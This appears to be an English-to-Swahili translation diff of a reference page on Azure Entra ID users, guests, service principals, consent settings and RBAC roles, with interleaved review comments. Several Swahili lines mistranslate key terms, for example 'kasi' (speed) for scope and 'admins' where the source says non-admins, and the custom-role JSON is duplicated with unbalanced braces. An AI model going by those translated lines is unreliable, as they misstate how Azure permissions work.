- Onyesha jina la barua pepe na kikoa kutoka kwa tenant iliyochaguliwa
|
||||
- Onyesha jina la kuonyesha
|
||||
- Onyesha nenosiri
|
||||
- Onyesha mali (jina la kwanza, cheo cha kazi, taarifa za mawasiliano…)
|
||||
- Aina ya mtumiaji wa kawaida ni “**mwanachama**”
|
||||
- **Watumiaji wa nje**
|
||||
- Onyesha barua pepe ya kuwalika na jina la kuonyesha (inaweza kuwa barua pepe isiyo ya Microsoft)
|
||||
- Onyesha mali
|
||||
- Aina ya mtumiaji wa kawaida ni “**Mgeni**”
|
||||
|
||||
### Members & Guests Default Permissions
|
||||
### Ruhusa za Kawaida za Wanachama na Wageni
|
||||
|
||||
You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
|
||||
Unaweza kuangalia katika [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) lakini kati ya vitendo vingine mwanachama ataweza:
|
||||
|
||||
- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
|
||||
- Invite Guests (_can be turned off_)
|
||||
- Create Security groups
|
||||
- Read non-hidden Group memberships
|
||||
- Add guests to Owned groups
|
||||
- Create new application (_can be turned off_)
|
||||
- Add up to 50 devices to Azure (_can be turned off_)
|
||||
- Kusoma watumiaji wote, Vikundi, Programu, Vifaa, Majukumu, Usajili, na mali zao za umma
|
||||
- Kualika Wageni (_inaweza kuzuiwa_)
|
||||
- Kuunda vikundi vya Usalama
|
||||
- Kusoma uanachama wa Kundi usiofichwa
|
||||
- Kuongeza wageni kwenye vikundi vilivyo na umiliki
|
||||
- Kuunda programu mpya (_inaweza kuzuiwa_)
|
||||
- Kuongeza vifaa hadi 50 kwenye Azure (_inaweza kuzuiwa_)
|
||||
|
||||
> [!NOTE]
|
||||
> Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
|
||||
> Kumbuka kwamba ili kuhesabu rasilimali za Azure mtumiaji anahitaji kibali maalum cha ruhusa.
|
||||
|
||||
### Users Default Configurable Permissions
|
||||
### Ruhusa za Kawaida za Watumiaji
|
||||
|
||||
- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Register Applications: Default **Yes**
- Restrict non-admin users from creating tenants: Default **No**
- Create security groups: Default **Yes**
- Restrict access to Microsoft Entra administration portal: Default **No**
- This doesn’t restrict API access to the portal (only web)
- Allow users to connect work or school account with LinkedIn: Default **Yes**
- Show keep user signed in: Default **Yes**
- Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
- Read other users: Default **Yes** (via Microsoft Graph)
- **Guests**
- **Guest user access restrictions**
- **Guest users have the same access as members** grants all member user permissions to guest users by default.
- **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
- **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
- **Guests can invite**
- **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
- **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
- **Only users assigned to specific admin roles can invite guest users**
- **No one in the organization can invite guest users including admins (most restrictive)**
- **External user leave**: Default **True**
- Allow external users to leave the organization
- **Wanachama (**[**hati**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Register Programu: Kawaida **Ndio**
- Zuia watumiaji wasio wasimamizi kuunda tenants: Kawaida **Hapana**
- Kuunda vikundi vya usalama: Kawaida **Ndio**
- Zuia ufikiaji wa lango la usimamizi la Microsoft Entra: Kawaida **Hapana**
- Hii haisimamii ufikiaji wa API kwa lango (tu wavuti)
- Ruhusu watumiaji kuunganisha akaunti za kazi au shule na LinkedIn: Kawaida **Ndio**
- Onyesha kuweka mtumiaji alisainiwa: Kawaida **Ndio**
- Zuia watumiaji kutoka kupona funguo za BitLocker kwa vifaa vyao vilivyo na umiliki: Kawaida Hapana (angalia kwenye Mipangilio ya Kifaa)
- Kusoma watumiaji wengine: Kawaida **Ndio** (kupitia Microsoft Graph)
- **Wageni**
- **Vikwazo vya ufikiaji wa mtumiaji mgeni**
- **Watumiaji wageni wana ufikiaji sawa na wanachama** inatoa ruhusa zote za mtumiaji mwanachama kwa watumiaji wageni kwa default.
- **Watumiaji wageni wana ufikiaji mdogo kwa mali na uanachama wa vitu vya directory (kawaida)** inazuia ufikiaji wa wageni kwa wasifu wao wenyewe wa mtumiaji kwa default. Ufikiaji wa watumiaji wengine na taarifa za kundi haukubaliwi tena.
- **Ufikiaji wa mtumiaji mgeni unazuiwa kwa mali na uanachama wa vitu vyao vya directory** ni wa kikomo zaidi.
- **Wageni wanaweza kuwalika**
- **Mtu yeyote katika shirika anaweza kuwalika watumiaji wageni ikiwa ni pamoja na wageni na wasimamizi (inayoeleweka zaidi) - Kawaida**
- **Watumiaji wanachama na watumiaji waliotolewa majukumu maalum ya usimamizi wanaweza kuwalika watumiaji wageni ikiwa ni pamoja na wageni wenye ruhusa za mwanachama**
- **Ni watumiaji pekee waliotolewa majukumu maalum ya usimamizi wanaweza kuwalika watumiaji wageni**
- **Hakuna mtu katika shirika anaweza kuwalika watumiaji wageni ikiwa ni pamoja na wasimamizi (inayoeleweka zaidi)**
- **Mtumiaji wa nje aondoke**: Kawaida **Kweli**
- Ruhusu watumiaji wa nje kuondoka katika shirika

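Review bot: the translated "Anyone in the organization can invite guest users including guests and non-admins" option reads "ikiwa ni pamoja na wageni na wasimamizi", which drops the negation and says admins where the source says non-admins; the wording this same block already uses for non-admin users two bullets up, "wasio wasimamizi", keeps the meaning. In the same list the parenthetical "(inayoeleweka zaidi)" is used both for "(most inclusive)" and, three bullets later, for "(most restrictive)", so the two ends of the scale now read identically; the two labels need distinct renderings.
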
> [!TIP]
> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
> Hata kama imezuiwa kwa kawaida, watumiaji (wanachama na wageni) wenye ruhusa zilizotolewa wanaweza kufanya vitendo vya awali.

### **Groups**
### **Vikundi**

There are **2 types of groups**:
Kuna **aina 2 za vikundi**:

- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
- This will have an **email address** with the domain of the EntraID tenant.
- **Usalama**: Aina hii ya kundi inatumika kutoa wanachama ufikiaji wa programu, rasilimali na kupewa leseni. Watumiaji, vifaa, wakala wa huduma na vikundi vingine vinaweza kuwa wanachama.
- **Microsoft 365**: Aina hii ya kundi inatumika kwa ushirikiano, ikitoa wanachama ufikiaji wa sanduku la barua lililotolewa, kalenda, faili, tovuti ya SharePoint, na kadhalika. Wanachama wa kundi wanaweza kuwa watumiaji pekee.
- Hii itakuwa na **anwani ya barua pepe** yenye kikoa cha tenant ya EntraID.

There are **2 types of memberships**:
Kuna **aina 2 za uanachama**:

- **Assigned**: Allow to manually add specific members to a group.
- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
- **Iliyotolewa**: Ruhusu kuongeza wanachama maalum kwa mkono kwenye kundi.
- **Uanachama wa Kijamii**: Inasimamia kiotomatiki uanachama kwa kutumia sheria, ikisasisha ujumuishaji wa kundi wakati sifa za wanachama zinabadilika.

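Review bot: "**Dynamic membership**" is rendered as "**Uanachama wa Kijamii**" in the memberships list, but "kijamii" means social, so the rule-driven, automatically updated behaviour the bullet goes on to describe is contradicted by its own label; the same rendering recurs further down in the Administrative Units list ("AUs zinasaidia **uanachama wa kijamii**" for "AUs support **dynamic memberships**") and both places need a term that conveys rule-based membership.
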
### **Service Principals**
### **Wakala wa Huduma**

A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity.
**Wakala wa Huduma** ni **utambulisho** ulioanzishwa kwa **matumizi** na **programu**, huduma zinazohudumiwa, na zana za kiotomatiki kufikia rasilimali za Azure. Ufikiaji huu ume **zuiwa na majukumu yaliyotolewa** kwa wakala wa huduma, na kukupa udhibiti juu ya **rasilimali zipi zinaweza kufikiwa** na kwa kiwango gani. Kwa sababu za usalama, kila wakati inapendekezwa **kutumia wakala wa huduma na zana za kiotomatiki** badala ya kuruhusu kuingia kwa utambulisho wa mtumiaji.

It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
Inawezekana **kuingia moja kwa moja kama wakala wa huduma** kwa kuunda **siri** (nenosiri), **cheti**, au kutoa **ufikiaji wa shirikisho** kwa majukwaa ya wahusika wengine (kwa mfano, Github Actions) juu yake.

- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
- If you choose certificate authentication, make sure the **application will have access over the private key**.
- Ikiwa unachagua uthibitishaji wa **nenosiri** (kwa kawaida), **hifadhi nenosiri lililotolewa** kwani huwezi kulifikia tena.
- Ikiwa unachagua uthibitishaji wa cheti, hakikisha **programu itakuwa na ufikiaji wa funguo za faragha**.

### App Registrations
### Usajili wa Programu

An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions.
Usajili wa **Programu** ni usanidi unaoruhusu programu kuungana na Entra ID na kufanya vitendo.

#### Key Components:
#### Vipengele Muhimu:

1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions). 
1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
4. **API Permissions:** Specifies what resources or APIs the app can access.
5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant.
1. The **service principal** will get all the requested permissions it was configured with.
1. **Kitambulisho cha Programu (Kitambulisho cha Mteja):** Kitambulisho cha kipekee kwa programu yako katika Azure AD.
2. **URIs za Kurudisha:** URL ambapo Azure AD inatuma majibu ya uthibitishaji.
3. **Cheti, Siri & Ruhusa za Shirikisho:** Inawezekana kuunda siri au cheti kuingia kama wakala wa huduma wa programu, au kutoa ufikiaji wa shirikisho kwake (kwa mfano, Github Actions). 
1. Ikiwa **cheti** au **siri** imeundwa, mtu anaweza **kuingia kama wakala wa huduma** kwa kutumia zana za CLI kwa kujua **kitambulisho cha programu**, **siri** au **cheti** na **tenant** (kikoa au ID).
4. **Ruhusa za API:** Inabainisha rasilimali au API zipi programu inaweza kufikia.
5. **Mipangilio ya Uthibitishaji:** Inafafanua mchakato wa uthibitishaji unaounga mkono programu (kwa mfano, OAuth2, OpenID Connect).
6. **Wakala wa Huduma**: Wakala wa huduma huundwa wakati programu inaundwa (ikiwa inafanywa kutoka kwenye konsole ya wavuti) au wakati inasakinishwa katika tenant mpya.
1. **Wakala wa huduma** utapata ruhusa zote zilizohitajika alizopangwa nazo.

### Default Consent Permissions
### Ruhusa za Kawaida za Kukubali

**User consent for applications**
**Ruhusa za mtumiaji kwa programu**

- **Do not allow user consent**
- An administrator will be required for all apps.
- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
- All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
- **Default** low impact permissions (although you need to accept to add them as low):
- User.Read - sign in and read user profile
- offline_access - maintain access to data that users have given it access to
- openid - sign users in
- profile - view user's basic profile
- email - view user's email address
- **Allow user consent for apps (Default)**
- All users can consent for any app to access the organization's data.
- **Usiruhusu ruhusa za mtumiaji**
- Msimamizi atahitajika kwa programu zote.
- **Ruhusu ruhusa za mtumiaji kwa programu kutoka kwa wachapishaji waliothibitishwa, kwa ruhusa zilizochaguliwa (Inapendekezwa)**
- Watumiaji wote wanaweza kukubali ruhusa zilizopangwa kama "athari ndogo", kwa programu kutoka kwa wachapishaji waliothibitishwa au programu zilizoorodheshwa katika shirika hili.
- **Kawaida** ruhusa za athari ndogo (ingawa unahitaji kukubali kuziongeza kama ndogo):
- User.Read - ingia na kusoma wasifu wa mtumiaji
- offline_access - kudumisha ufikiaji wa data ambayo watumiaji wameipa ufikiaji
- openid - ingiza watumiaji
- profile - ona wasifu wa msingi wa mtumiaji
- email - ona anwani ya barua pepe ya mtumiaji
- **Ruhusu ruhusa za mtumiaji kwa programu (Kawaida)**
- Watumiaji wote wanaweza kukubali kwa programu yoyote kufikia data za shirika.

**Admin consent requests**: Default **No**
**Maombi ya ruhusa za msimamizi**: Kawaida **Hapana**

- Users can request admin consent to apps they are unable to consent to
- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
- Configure also if users will receive email notifications and expiration reminders 
- Watumiaji wanaweza kuomba ruhusa za msimamizi kwa programu ambazo hawawezi kukubali
- Ikiwa **Ndio**: Inawezekana kuonyesha Watumiaji, Vikundi na Majukumu ambayo yanaweza kukubali maombi
- Sanidi pia ikiwa watumiaji watapokea arifa za barua pepe na ukumbusho wa muda wa mwisho 

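Review bot: in the Default Consent Permissions block "ruhusa" is used for both "consent" ("**Ruhusa za mtumiaji kwa programu**", "**Usiruhusu ruhusa za mtumiaji**", "**Maombi ya ruhusa za msimamizi**") and "permissions" ("**Ruhusa za API:**" in the App Registrations list, "ruhusa za athari ndogo"), while the section heading itself uses "Kukubali" for consent; with one word for both, "Ruhusu ruhusa za mtumiaji" reads as "allow user permissions" rather than "allow user consent", which inverts who is granting what. Keep "ruhusa" for the permissions being granted and use the heading's "kukubali" consistently for the act of consenting.
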
### **Managed Identity (Metadata)**
### **Utambulisho wa Kusimamiwa (Metadata)**

Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure.
Utambulisho wa kusimamiwa katika Azure Active Directory unatoa suluhisho la **kusimamia kiotomatiki utambulisho** wa programu. Utambulisho huu unatumika na programu kwa lengo la **kuunganisha** na **rasilimali** zinazofaa na uthibitishaji wa Azure Active Directory (**Azure AD**). Hii inaruhusu **kuondoa hitaji la kuweka akiba ya akidi za wingu** katika msimbo kwani programu itakuwa na uwezo wa kuwasiliana na huduma ya **metadata** ili kupata token halali ya **kufanya vitendo** kama utambulisho wa kusimamiwa ulioonyeshwa katika Azure.

There are two types of managed identities:
Kuna aina mbili za utambulisho wa kusimamiwa:

- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
- **Iliyotolewa na mfumo**. Huduma zingine za Azure zinakuruhusu **kuwezesha utambulisho wa kusimamiwa moja kwa moja kwenye mfano wa huduma**. Unapowezesha utambulisho wa kusimamiwa wa mfumo, **wakala wa huduma** huundwa katika tenant ya Entra ID inayotegemewa na usajili ambapo rasilimali iko. Wakati **rasilimali** inafutwa, Azure kiotomatiki **inafuta** **utambulisho** kwa ajili yako.
- **Iliyotolewa na mtumiaji**. Pia inawezekana kwa watumiaji kuunda utambulisho wa kusimamiwa. Hizi huundwa ndani ya kundi la rasilimali ndani ya usajili na wakala wa huduma utaanzishwa katika EntraID inayotegemewa na usajili. Kisha, unaweza kupeana utambulisho wa kusimamiwa kwa mfano mmoja au **zaidi** ya huduma ya Azure (rasilimali nyingi). Kwa utambulisho wa kusimamiwa wa mtumiaji, **utambulisho unasimamiwa tofauti na rasilimali zinazoutumia**.

Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
Utambulisho wa Kusimamiwa **hauzali akidi za kudumu** (kama nenosiri au vyeti) kufikia kama wakala wa huduma ulioambatanishwa nayo.

### Enterprise Applications
### Programu za Kijamii

It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to.
Ni tu **meza katika Azure kuchuja wakala wa huduma** na kuangalia programu ambazo zimepewa.

**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities.
**Sio aina nyingine ya "programu",** hakuna kitu chochote katika Azure ambacho ni "Programu ya Kijamii", ni tu muundo wa kuangalia Wakala wa huduma, Usajili wa programu na utambulisho wa kusimamiwa.

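Review bot: "Enterprise Applications" / "Enterprise Application" is rendered as "**Programu za Kijamii**" and "Programu ya Kijamii", but "kijamii" means social, not enterprise, so the heading names a different thing from the portal blade the paragraph describes. Since the paragraph itself says this is only the portal's filtered view of service principals, keeping the product term "Enterprise Applications" untranslated, as the commit already does for "Entra ID", "SharePoint" and "Microsoft Graph", would avoid inventing a misleading name.
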
### Administrative Units
### Vitengo vya Utawala

Administrative units allows to **give permissions from a role over a specific portion of an organization**.
Vitengo vya utawala vinaruhusu **kutoa ruhusa kutoka kwa jukumu juu ya sehemu maalum ya shirika**.

Example:
Mfano:

- Scenario: A company wants regional IT admins to manage only the users in their own region.
- Implementation:
- Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
- Populate AUs with users from their respective regions.
- AUs can **contain users, groups, or devices**
- AUs support **dynamic memberships**
- AUs **cannot contain AUs**
- Assign Admin Roles:
- Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
- Hali: Kampuni inataka wasimamizi wa IT wa kikanda wasimamie tu watumiaji katika eneo lao.
- Utekelezaji:
- Unda Vitengo vya Utawala kwa kila eneo (kwa mfano, "Kaskazini mwa Amerika AU", "Ulaya AU").
- Jaza AUs na watumiaji kutoka maeneo yao.
- AUs zinaweza **kuhifadhi watumiaji, vikundi, au vifaa**
- AUs zinasaidia **uanachama wa kijamii**
- AUs **haziwezi kuwa na AUs**
- Peana Majukumu ya Usimamizi:
- Peana jukumu la "Msimamizi wa Watumiaji" kwa wafanyakazi wa IT wa kikanda, lililowekwa kwenye AU ya eneo lao.
- Matokeo: Wasimamizi wa IT wa kikanda wanaweza kusimamia akaunti za watumiaji ndani ya eneo lao bila kuathiri maeneo mengine.

### Entra ID Roles
### Majukumu ya Entra ID

- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
- Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- The most privileged role is **Global Administrator**
- In the Description of the role it’s possible to see its **granular permissions**
- Ili kusimamia Entra ID kuna **majukumu yaliyojengwa ndani** ambayo yanaweza kutolewa kwa wakala wa Entra ID kusimamia Entra ID
- Angalia majukumu katika [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- Jukumu lenye mamlaka zaidi ni **Msimamizi wa Kimataifa**
- Katika Maelezo ya jukumu inawezekana kuona **ruhusa zake za kina**

## Roles & Permissions
## Majukumu & Ruhusa

**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)`
**Majukumu** yanatolewa kwa **wakala** kwenye **kasi**: `wakala -[ANA JUKUMU]->(kasi)`

**Roles** assigned to **groups** are **inherited** by all the **members** of the group.
**Majukumu** yaliyotolewa kwa **vikundi** yanarithiwa na **wanachama** wote wa kundi.

Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group.
Kulingana na kasi ambayo jukumu lilitolewa, **jukumu** linaweza **kurithiwa** kwa **rasilimali nyingine** ndani ya kontena la kasi. Kwa mfano, ikiwa mtumiaji A ana **jukumu kwenye usajili**, atakuwa na **jukumu hilo kwenye vikundi vyote vya rasilimali** ndani ya usajili na kwenye **rasilimali zote** ndani ya kundi la rasilimali.

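Review bot: the inline code span `principal -[HAS ROLE]->(scope)` has been translated to `wakala -[ANA JUKUMU]->(kasi)`; code spans should be left exactly as in the source, since the notation is what readers will match against the English documentation. Separately, "kasi" (speed) is used for "scope" both here ("kwenye **kasi**") and in the inheritance paragraph ("kontena la kasi"), so the paragraph explaining that a role on a subscription is inherited by its resource groups loses the very concept it is about; a word meaning scope or extent is needed in both places.
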
### **Classic Roles**
### **Majukumu ya K klasiki**

| **Owner** | <ul><li>Full access to all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| **Mmiliki** | <ul><li>Ufikiaji kamili kwa rasilimali zote</li><li>Anaweza kusimamia ufikiaji kwa watumiaji wengine</li></ul> | Aina zote za rasilimali |
| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
| **Contributor** | <ul><li>Full access to all resources</li><li>Cannot manage access</li></ul> | All resource types |
| **Reader** | • View all resources | All resource types |
| **User Access Administrator** | <ul><li>View all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| **Mchangiaji** | <ul><li>Ufikiaji kamili kwa rasilimali zote</li><li>Haiwezi kusimamia ufikiaji</li></ul> | Aina zote za rasilimali |
| **Msomaji** | • Ona rasilimali zote | Aina zote za rasilimali |
| **Msimamizi wa Ufikiaji wa Mtumiaji** | <ul><li>Ona rasilimali zote</li><li>Anaweza kusimamia ufikiaji kwa watumiaji wengine</li></ul> | Aina zote za rasilimali |

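Review bot: the translated heading "### **Majukumu ya K klasiki**" contains a broken word ("K klasiki"); it should be one word. The classic role names themselves ("Owner", "Contributor", "Reader", "User Access Administrator") are the literal names shown in the Azure portal and returned by the CLI, so translating them in the first column ("Mmiliki", "Mchangiaji", "Msomaji", "Msimamizi wa Ufikiaji wa Mtumiaji") makes the table hard to cross-reference; keeping the English names and translating only the description column would be safer.
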
### Built-In roles
### Majukumu Yaliyojengwa Ndani

[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
[Kutoka kwenye hati: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Udhibiti wa ufikiaji wa Azure (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) ina majukumu kadhaa ya Azure **yaliyojengwa ndani** ambayo unaweza **kutoa** kwa **watumiaji, vikundi, wakala wa huduma, na utambulisho wa kusimamiwa**. Utoaji wa majukumu ndiyo njia unayodhibiti **ufikiaji wa rasilimali za Azure**. Ikiwa majukumu yaliyojengwa ndani hayakidhi mahitaji maalum ya shirika lako, unaweza kuunda [**majukumu ya kawaida ya Azure**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**

**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources:
**Majukumu Yaliyojengwa Ndani** yanatumika tu kwa **rasilimali** ambazo zime **kusudiwa**, kwa mfano angalia mifano hii 2 ya **Majukumu Yaliyojengwa Ndani** juu ya rasilimali za **Kumbukumbu**:

| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| [Msomaji wa Nakala ya Disk](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Inatoa ruhusa kwa vault ya nakala kufanya nakala ya disk. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ |
| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
| [Kuingia kwa Mtumiaji wa Mashine ya Virtual](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | Ona Mashine za Virtual kwenye lango na kuingia kama mtumiaji wa kawaida. | fb879df8-f326-4884-b1cf-06f3ad86be52 |

This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
Majukumu haya yanaweza **pia kutolewa juu ya kontena za mantiki** (kama vile vikundi vya usimamizi, usajili na vikundi vya rasilimali) na wakala walioathiriwa watakuwa nao **juu ya rasilimali ndani ya kontena hizo**.

- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
- Pata hapa orodha ya [**majukumu yote ya Azure yaliyojengwa ndani**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Pata hapa orodha ya [**majukumu yote ya Entra ID yaliyojengwa ndani**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).

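Review bot: "**Built-In roles over Compute** resources" becomes "juu ya rasilimali za **Kumbukumbu**", and "kumbukumbu" means memory or record, not compute; the two rows that follow (Disk Backup Reader, Virtual Machine User Login) are compute roles, so either leave "Compute" as the Azure service name or use a term for computing. In the same table the built-in role display names were translated ("Msomaji wa Nakala ya Disk", "Kuingia kwa Mtumiaji wa Mashine ya Virtual") while the links and role definition GUIDs in the other columns still refer to the English names; keeping the names verbatim is what lets a reader look them up in the portal or with the CLI.
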
### Custom Roles
### Majukumu ya Kawaida

- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
- It’s possible to configure all the granular permissions the custom role will have
- It’s possible to exclude permissions
- A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere
- It’s possible to use wildcards
- The used format is a JSON
- `actions` are for control actions over the resource
- `dataActions` are permissions over the data within the object

Example of permissions JSON for a custom role:
- Pia inawezekana kuunda [**majukumu ya kawaida**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
- Yanaanzishwa ndani ya kasi, ingawa jukumu linaweza kuwa katika kasi kadhaa (vikundi vya usimamizi, usajili na vikundi vya rasilimali)
- Inawezekana kusanidi ruhusa zote za kina ambazo jukumu la kawaida litakuwa nazo
- Inawezekana kuondoa ruhusa
- Wakala mwenye ruhusa iliyondolewa hataweza kuitumia hata kama ruhusa hiyo inatolewa mahali pengine
- Inawezekana kutumia wildcards
- Muundo unaotumika ni JSON
- `actions` ni kwa ajili ya kudhibiti vitendo juu ya rasilimali
- `dataActions` ni ruhusa juu ya data ndani ya kitu

Mfano wa ruhusa JSON kwa jukumu la kawaida:
```json
{
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
}
```

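Review bot: the body of the ```json example is emitted twice, once as removed lines and once as added lines, with no visible difference in content between the two copies (same `roleName`, `assignableScopes`, `actions` and `notActions` entries), which suggests the commit changed only the indentation inside the fenced block; a translation commit should leave fenced code untouched so that reviewers can see at a glance that the example is unchanged. In the bullet list above, "kasi" (speed) is again used for "scope" ("Yanaanzishwa ndani ya kasi, ingawa jukumu linaweza kuwa katika kasi kadhaa"), so the statement that a custom role is created inside a scope but can be assignable in several scopes no longer says what the English bullet says; it needs a term meaning scope, matching the `assignableScopes` key the JSON below uses.
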
### Permissions order

- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
- An explicit **deny role assignment takes precedence** over the role granting the permission.
- Ili **principal awe na ufikiaji wa rasilimali** anahitaji jukumu lililo wazi kumwagiwa (kwa namna yoyote) **linalompa ruhusa hiyo**.
- Jukumu lililo wazi la **kukataa linachukua kipaumbele** juu ya jukumu linalotoa ruhusa.

